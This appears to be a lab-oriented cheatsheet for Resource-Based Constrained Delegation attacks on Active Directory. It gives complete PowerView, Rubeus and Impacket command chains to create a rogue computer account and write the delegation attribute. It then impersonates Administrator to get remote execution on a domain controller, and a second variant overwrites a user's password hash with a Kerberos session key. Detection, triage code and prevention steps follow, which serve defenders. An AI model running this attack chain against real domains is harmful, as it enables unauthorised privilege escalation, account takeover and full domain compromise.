
RBCD (Resource-Based Constrained Delegation) Attack Cheatsheet

Prerequisites

Required Conditions

  1. Write access to the target computer object: GenericAll, GenericWrite, WriteDacl or WriteOwner, or WriteProperty on msDS-AllowedToActOnBehalfOfOtherIdentity specifically
  2. Control of an account that has an SPN (a computer account, or a user account with an SPN); with ms-DS-MachineAccountQuota > 0 (default 10) any domain user can create a computer account
  3. Domain controllers running Windows Server 2012 or later (the KDC must understand the attribute)

Check Prerequisites

# Windows - find computer objects on which a principal holds write rights
Import-Module C:\Tools\PowerView.ps1
Get-DomainComputer | Get-ObjectAcl -ResolveGUIDs |
    ?{ $_.ActiveDirectoryRights -match "GenericWrite|GenericAll|WriteDacl|WriteOwner" -or
       ($_.ActiveDirectoryRights -match "WriteProperty" -and $_.ObjectAceType -match "Allowed-To-Act-On-Behalf|^All$") } |
    Select-Object ObjectDN, ActiveDirectoryRights, ObjectAceType, SecurityIdentifier
# Domain Admins, Enterprise Admins, SYSTEM and the computer itself always show up here;
# the useful rows are SIDs of ordinary users or groups you control (resolve them with ConvertFrom-SID)

Method 1: Standard RBCD Attack (Computer Account)

From Windows

Step 1: Create Fake Computer Account

# Using PowerMad (needs ms-DS-MachineAccountQuota > 0, default 10; if it is 0 see Method 2)
Import-Module .\Powermad.ps1
New-MachineAccount -MachineAccount HACKTHEBOX -Password $(ConvertTo-SecureString "Hackthebox123+!" -AsPlainText -Force)

Step 2: Configure RBCD on Target

Import-Module .\PowerView.ps1

# Get computer SID
$ComputerSid = Get-DomainComputer HACKTHEBOX -Properties objectsid | Select -Expand objectsid

# Create security descriptor
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

# Set msDS-AllowedToActOnBehalfOfOtherIdentity
$creds = New-Object System.Management.Automation.PSCredential "DOMAIN\user", (ConvertTo-SecureString "password" -AsPlainText -Force)
Get-DomainComputer DC01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Credential $creds
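The `$SDBytes` written above are an opaque blob, and the verification step further down only tells you whether something is set, not what. The following is an added example (not code from this page, PowerView or Impacket) that builds the same self-relative security descriptor those tools write and decodes one read back from LDAP, so you can confirm exactly which SIDs are trusted to delegate. The SID `S-1-5-21-1234567890-1234567890-1234567890-1105` is a made-up stand-in for the HACKTHEBOX$ account.

```python
"""Encode and decode msDS-AllowedToActOnBehalfOfOtherIdentity.

Added example, not code from the page, PowerView or Impacket. It produces the
same self-relative SECURITY_DESCRIPTOR those tools write: owner BA
(BUILTIN\\Administrators), no group, no SACL, and a DACL with one
ACCESS_ALLOWED_ACE per delegating SID carrying mask 0x000F01FF, which is the
CCDCLCSWRPWPDTLOCRSDRCWDWO string used in the PowerShell step above.
"""
import struct

RBCD_ACCESS_MASK = 0x000F01FF                 # CCDCLCSWRPWPDTLOCRSDRCWDWO
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
ACL_REVISION_DS = 4
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"       # the O:BA owner


def sid_to_bytes(sid: str) -> bytes:
    """'S-1-5-21-...' -> binary SID: revision, sub-authority count,
    6-byte big-endian identifier authority, little-endian sub-authorities."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0] != "S" or parts[1] != "1":
        raise ValueError(f"malformed SID: {sid}")
    subs = [int(p) for p in parts[3:]]
    if len(subs) > 15:
        raise ValueError(f"too many sub-authorities: {sid}")
    return (struct.pack("<BB", 1, len(subs)) + int(parts[2]).to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def sid_from_bytes(buf: bytes, offset: int = 0) -> str:
    """Decode the binary SID that starts at buf[offset]."""
    revision, count = struct.unpack_from("<BB", buf, offset)
    if revision != 1:
        raise ValueError("unsupported SID revision")
    authority = int.from_bytes(buf[offset + 2:offset + 8], "big")
    subs = struct.unpack_from(f"<{count}I", buf, offset + 8)
    return "-".join(["S", "1", str(authority), *map(str, subs)])


def build_rbcd_descriptor(*delegate_sids: str) -> bytes:
    """Attribute value letting every SID given act on behalf of other identities."""
    aces = b""
    for sid in delegate_sids:
        sid_bin = sid_to_bytes(sid)
        # ACE: type, flags, size (8-byte header + SID), access mask, then the SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0,
                            8 + len(sid_bin), RBCD_ACCESS_MASK) + sid_bin
    # ACL header: revision, sbz1, total size, ACE count, sbz2
    dacl = struct.pack("<BBHHH", ACL_REVISION_DS, 0, 8 + len(aces),
                       len(delegate_sids), 0) + aces
    owner = sid_to_bytes(BUILTIN_ADMINISTRATORS)
    header_len = 20                           # fixed SECURITY_DESCRIPTOR size
    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                         header_len,                 # OffsetOwner
                         0, 0,                       # OffsetGroup, OffsetSacl: absent
                         header_len + len(owner))    # OffsetDacl
    return header + owner + dacl


def parse_rbcd_descriptor(blob: bytes) -> list[str]:
    """SIDs allowed to delegate to the object holding this value: the trustees
    of the ACCESS_ALLOWED ACEs in the DACL (other ACE types are skipped)."""
    revision, _, control, _, _, _, offset_dacl = struct.unpack_from("<BBHIIII", blob, 0)
    if revision != 1 or not control & SE_DACL_PRESENT or offset_dacl == 0:
        raise ValueError("no DACL present: attribute empty or not a security descriptor")
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", blob, offset_dacl)
    pos = offset_dacl + 8
    trustees = []
    for _ in range(ace_count):
        ace_type, _, ace_size, _ = struct.unpack_from("<BBHI", blob, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            trustees.append(sid_from_bytes(blob, pos + 8))
        pos += ace_size
    return trustees


if __name__ == "__main__":
    # Hypothetical SID of the attacker-controlled HACKTHEBOX$ account
    fake_computer = "S-1-5-21-1234567890-1234567890-1234567890-1105"
    blob = build_rbcd_descriptor(fake_computer)
    print(blob.hex())                     # the bytes to put into the attribute
    print(parse_rbcd_descriptor(blob))    # what a read-back should decode to
```

The encoder output is byte-for-byte what `$SDBytes` holds, so it can be written with any LDAP client; the decoder is the check to run on the raw value PowerView or ldapsearch returns before you trust that the SID you think is delegating really is.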

Step 3: Get Computer Account Hash

.\Rubeus.exe hash /password:Hackthebox123+! /user:HACKTHEBOX$ /domain:inlanefreight.local
# Note the RC4 hash

Step 4: Perform S4U Attack

.\Rubeus.exe s4u /user:HACKTHEBOX$ /rc4:CF767C9A9C529361F108AA67BF1B3695 /impersonateuser:administrator /msdsspn:cifs/dc01.inlanefreight.local /ptt

# Or have Rubeus rewrite the service name into extra tickets from the same S4U exchange;
# most Windows services do not validate the service class in the ticket, only that it decrypts with the host key
.\Rubeus.exe s4u /user:HACKTHEBOX$ /rc4:CF767C9A9C529361F108AA67BF1B3695 /impersonateuser:administrator /msdsspn:cifs/dc01.inlanefreight.local /altservice:host,rpcss,wsman,http,ldap /ptt

From Linux

Step 1: Create Computer Account

# Using Impacket
impacket-addcomputer -computer-name 'HACKTHEBOX$' -computer-pass 'Hackthebox123+!' -dc-ip 10.129.205.35 inlanefreight.local/carole.holmes

Step 2: Configure RBCD

# Using rbcd.py
impacket-rbcd -delegate-from HACKTHEBOX$ -delegate-to DC01$ -dc-ip 10.129.205.35 -action write INLANEFREIGHT.LOCAL/carole.holmes:'Y3t4n0th3rP4ssw0rd'

Step 3: Get Service Ticket

# Get a TGS for Administrator to the target service (the machine account name needs its trailing $)
impacket-getST -spn cifs/DC01.inlanefreight.local -impersonate Administrator -dc-ip 10.129.205.35 inlanefreight.local/'HACKTHEBOX$':'Hackthebox123+!'

# Use the file getST reports in "Saving ticket in ..."; current Impacket names it after the
# impersonated user, SPN and realm, older releases simply Administrator.ccache
export KRB5CCNAME=./Administrator@cifs_DC01.inlanefreight.local@INLANEFREIGHT.LOCAL.ccache

Step 4: Connect to Target

# Using psexec
impacket-psexec -k -no-pass dc01.inlanefreight.local

# Or wmiexec
impacket-wmiexec -k -no-pass dc01.inlanefreight.local

# Remember to add to /etc/hosts:
# 10.129.205.35 dc01.inlanefreight.local

Method 2: RBCD with Normal User Account (When MachineAccountQuota = 0)

Prerequisites

  • The user's password or NT hash
  • RC4 usable for the user's TGT. In S4U2proxy the KDC must decrypt the S4U2self ticket with the requesting account's long-term key, but with U2U that ticket is encrypted under the TGT session key; the trick below therefore sets the user's NT hash (which is the RC4 long-term key) equal to the session key, so the session key must itself be RC4 (etype 23). With an AES session key the password change succeeds but S4U2proxy fails.
  • Write access to the target's msDS-AllowedToActOnBehalfOfOtherIdentity with the user added as trustee (same as Method 1 Step 2, with -delegate-from or the SID pointing at the user rather than a computer)
  • Willingness to burn the account: the password change is irreversible from the attacker's side and the user's old password stops working

From Linux

Step 1: Get NT Hash from Password

pypykatz crypto nt 'B3thR!ch@rd$'
# Output: de3d16603d7ded97bb47cd6641b1a392

Step 2: Get TGT

impacket-getTGT INLANEFREIGHT.LOCAL/beth.richards -hashes :de3d16603d7ded97bb47cd6641b1a392 -dc-ip 10.129.205.35

Step 3: Extract Session Key

impacket-describeTicket beth.richards.ccache | grep -E 'Ticket Session Key|KeyType'
# Output: 7c3d8b8b135c7d574e423dcd826cab58
# The key type must be rc4_hmac (etype 23); if it is AES, stop here, the next step would only lock the user out

Step 4: Change User Password to Match Session Key

# Hash-to-hash change, no plaintext needed; irreversible for the user (old password no longer works)
impacket-changepasswd INLANEFREIGHT.LOCAL/beth.richards@10.129.205.35 -hashes :de3d16603d7ded97bb47cd6641b1a392 -newhash :7c3d8b8b135c7d574e423dcd826cab58

Step 5: Request Service Ticket with U2U

KRB5CCNAME=beth.richards.ccache impacket-getST -u2u -impersonate Administrator -spn TERMSRV/DC01.INLANEFREIGHT.LOCAL -no-pass INLANEFREIGHT.LOCAL/beth.richards -dc-ip 10.129.205.35

Step 6: Connect to Target

# A TERMSRV ticket also works for WMI/SMB: the receiving host only needs the ticket to decrypt with its key, it does not check the service class
KRB5CCNAME=Administrator@TERMSRV_DC01.INLANEFREIGHT.LOCAL@INLANEFREIGHT.LOCAL.ccache impacket-wmiexec DC01.INLANEFREIGHT.LOCAL -k -no-pass

From Windows (Modified Rubeus)

# Stock Rubeus has no flow that changes the user's password to the TGT session key and then runs the U2U S4U2self/S4U2proxy exchange;
# a modified build is required, so this variant is normally run with the Impacket chain above from a Linux host

Common SPNs to Target

Service                  SPN
SMB/CIFS (psexec etc.)   cifs/target.domain.local
WinRM                    http/target.domain.local or wsman/target.domain.local
PowerShell Remoting      http/target.domain.local
RDP                      termsrv/target.domain.local
LDAP                     ldap/target.domain.local
WMI                      host/target.domain.local (plus rpcss/target.domain.local)

Troubleshooting

Common Errors

Error                        Cause                                                              Solution
KDC_ERR_S_PRINCIPAL_UNKNOWN  Account performing S4U2self has no SPN                             Use the U2U method or a computer account
KDC_ERR_BADOPTION            S4U2proxy refused: attribute not written or not yet replicated,    Re-read the attribute, pick another user to
                             impersonated user is protected (Protected Users / "sensitive,      impersonate, or (U2U) confirm the new NT hash
                             cannot be delegated"), or the KDC cannot decrypt the S4U2self      equals the TGT session key
                             ticket because the password change did not take
KRB_AP_ERR_SKEW              Clock more than 5 minutes off the DC                               Sync time with the DC
Access Denied                Wrong service class for the protocol, or the impersonated          Try other SPNs (cifs, host, http) or another user
                             user has no rights on the target

Verification Commands

# Check if RBCD is configured on the target (rbcd.py takes -delegate-to, not -t, and domain/user syntax)
impacket-rbcd -dc-ip 10.129.205.35 -delegate-to 'DC01$' -action read inlanefreight.local/user:password

# Confirm the computer account you created exists (quote the name so PowerShell does not treat $ as a variable)
Get-DomainComputer -Identity 'HACKTHEBOX$'

# Check current ticket
klist

Cleanup

Remove RBCD Configuration

# Windows
Get-DomainComputer DC01 | Set-DomainObject -Clear 'msds-allowedtoactonbehalfofotheridentity' -Credential $creds
# Linux - remove only your account from the attribute (use -action flush to clear it entirely)
impacket-rbcd -dc-ip 10.129.205.35 -delegate-from 'HACKTHEBOX$' -delegate-to 'DC01$' -action remove inlanefreight.local/user:password

Remove Computer Account

# Windows (needs delete rights on the object or its OU; the user who created it through
# MachineAccountQuota usually cannot delete it and can only disable it)
Remove-ADComputer -Identity "HACKTHEBOX" -Credential $creds

Detection Indicators

  • Event ID 4741: computer account created by an ordinary user (Method 1; the creator is the Subject)
  • Event ID 4742: computer account changed, often accompanying the attribute write
  • Event ID 5136: directory object modified with AttributeLDAPDisplayName msDS-AllowedToActOnBehalfOfOtherIdentity; requires a SACL auditing writes to the attribute and is the highest-fidelity signal
  • Event ID 4723/4724: password change (4723, the self-change in Method 2) or reset (4724) on the delegating user
  • Event ID 4768: TGT requested with RC4 (TicketEncryptionType 0x17) where AES is the norm
  • Event ID 4769: service ticket with TransitedServices populated (S4U2proxy), TargetUserName a privileged user and the requesting account a freshly created computer or a plain user
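The indicators above are low value in isolation (4769 with RC4 happens constantly in mixed estates); they pay off when correlated. The following is an added example, not from the page, that runs that correlation over constructed events: the keys are the EventData field names of the real 4741, 5136, 4723 and 4769 events, so the same functions apply to events parsed from Get-WinEvent or a SIEM. The SIDs, names and addresses are made up.

```python
"""Triage Windows Security events for the RBCD indicators listed above.

Added example, not from the page. SAMPLE_EVENTS is constructed, not real log
data; its keys mirror the EventData field names of the real 4741, 5136, 4723
and 4769 events. 5136 for the attribute is only logged when a SACL audits
writes to it on the computer objects.
"""
import re

RBCD_ATTRIBUTE = "msDS-AllowedToActOnBehalfOfOtherIdentity"
RC4_HMAC = "0x17"            # 4769 TicketEncryptionType for RC4-HMAC
VALUE_ADDED = "%%14674"      # 5136 OperationType "Value Added" (%%14675 = Value Deleted)

SAMPLE_EVENTS = [  # constructed
    {"EventID": 4741, "SubjectUserName": "carole.holmes", "TargetUserName": "HACKTHEBOX$"},
    {"EventID": 5136, "SubjectUserName": "carole.holmes",
     "ObjectDN": "CN=DC01,OU=Domain Controllers,DC=inlanefreight,DC=local",
     "ObjectClass": "computer", "AttributeLDAPDisplayName": RBCD_ATTRIBUTE,
     "AttributeValue": "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;"
                       "S-1-5-21-1234567890-1234567890-1234567890-1105)",
     "OperationType": VALUE_ADDED},
    {"EventID": 4769, "TargetUserName": "Administrator@INLANEFREIGHT.LOCAL",
     "ServiceName": "DC01$", "TicketEncryptionType": RC4_HMAC,
     "TransitedServices": "HACKTHEBOX$@INLANEFREIGHT.LOCAL", "IpAddress": "::ffff:10.129.205.40"},
    # Method 2 variant: the user changes her own password, then delegates
    {"EventID": 4723, "SubjectUserName": "beth.richards", "TargetUserName": "beth.richards"},
    {"EventID": 4769, "TargetUserName": "Administrator@INLANEFREIGHT.LOCAL",
     "ServiceName": "DC01$", "TicketEncryptionType": RC4_HMAC,
     "TransitedServices": "beth.richards@INLANEFREIGHT.LOCAL", "IpAddress": "::ffff:10.129.205.41"},
    # ordinary AES service ticket request; must not alert
    {"EventID": 4769, "TargetUserName": "beth.richards@INLANEFREIGHT.LOCAL",
     "ServiceName": "DC01$", "TicketEncryptionType": "0x12",
     "TransitedServices": "-", "IpAddress": "::ffff:10.129.205.12"},
]


def sids_in_sddl(sddl: str) -> list[str]:
    """Trustee SIDs of every ACE in an SDDL string like O:BAD:(A;;...;;;S-1-5-21-...)."""
    return re.findall(r";;;(S-1-[0-9-]+)\)", sddl)


def rbcd_attribute_changes(events: list[dict]) -> list[dict]:
    """5136 events that wrote the RBCD attribute: who, on which object, which trustees."""
    hits = []
    for e in events:
        if e.get("EventID") != 5136:
            continue
        if e.get("AttributeLDAPDisplayName", "").lower() != RBCD_ATTRIBUTE.lower():
            continue
        hits.append({"actor": e["SubjectUserName"], "target": e["ObjectDN"],
                     "operation": "added" if e.get("OperationType") == VALUE_ADDED else "removed",
                     "trustees": sids_in_sddl(e.get("AttributeValue", ""))})
    return hits


def s4u2proxy_tickets(events: list[dict]) -> list[dict]:
    """4769 events with TransitedServices populated: an account obtained a ticket
    to ServiceName on behalf of TargetUserName, i.e. S4U2proxy."""
    hits = []
    for e in events:
        if e.get("EventID") != 4769 or e.get("TransitedServices", "-") in ("", "-"):
            continue
        hits.append({"impersonated": e["TargetUserName"], "target_service": e["ServiceName"],
                     "delegating_account": e["TransitedServices"],
                     "rc4": e.get("TicketEncryptionType") == RC4_HMAC, "source": e.get("IpAddress")})
    return hits


def triage(events: list[dict]) -> list[str]:
    """Correlate attribute writes and S4U2proxy with who created the delegating
    computer (4741) or changed its password (4723/4724) in the same window."""
    created = {e["TargetUserName"].upper(): e["SubjectUserName"]
               for e in events if e.get("EventID") == 4741}
    pw_changed = {e["TargetUserName"].upper() for e in events if e.get("EventID") in (4723, 4724)}
    alerts = []
    for c in rbcd_attribute_changes(events):
        alerts.append(f"RBCD trustee {c['operation']} on {c['target']} by {c['actor']}: "
                      f"{', '.join(c['trustees'])}")
    for t in s4u2proxy_tickets(events):
        account = t["delegating_account"].split("@")[0].upper()
        context = []
        if account in created:
            context.append(f"computer created by {created[account]}")
        if account in pw_changed:
            context.append("password changed in this window (U2U variant)")
        if t["rc4"]:
            context.append("RC4 ticket")
        suffix = f" [{'; '.join(context)}]" if context else ""
        alerts.append(f"S4U2proxy by {account} as {t['impersonated']} to "
                      f"{t['target_service']} from {t['source']}{suffix}")
    return alerts


if __name__ == "__main__":
    for line in triage(SAMPLE_EVENTS):
        print(line)
```

The 5136 path is the one to build rules on: it names the actor, the target computer and the trustee SID in a single event. The 4769 path needs the creation and password-change context to separate an attack from legitimate constrained delegation by a service account.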

Prevention

  1. Set ms-DS-MachineAccountQuota to 0 (stops Method 1 for ordinary users; Method 2 still works against any user whose target attribute the attacker can write)
  2. Disable RC4 for Kerberos (AES-only msDS-SupportedEncryptionTypes), which breaks the U2U session-key trick
  3. Audit and restrict write permissions on computer objects, above all domain controllers and other tier-0 servers
  4. Put privileged accounts in Protected Users or mark them "Account is sensitive and cannot be delegated"; the KDC then refuses to delegate them and S4U2proxy for those users fails
  5. Set a SACL on msDS-AllowedToActOnBehalfOfOtherIdentity and alert on event 5136 for it
  6. Enable PAC validation on servers (limits what a tampered service ticket can do; not a direct RBCD control)

Tools Reference

Windows Tools

  • PowerView: AD enumeration and manipulation
  • PowerMad: Computer account creation
  • Rubeus: Kerberos attack tool
  • Mimikatz: Credential extraction

Linux Tools

  • Impacket Suite:
      • addcomputer.py: Create computer accounts
      • getTGT.py: Request TGTs
      • getST.py: Request service tickets
      • psexec.py, wmiexec.py, smbexec.py: Remote execution
      • describeTicket.py: Parse ticket details
      • changepasswd.py: Change passwords
      • rbcd.py: RBCD configuration tool
  • BloodHound.py: AD enumeration
  • pypykatz: Password/hash operations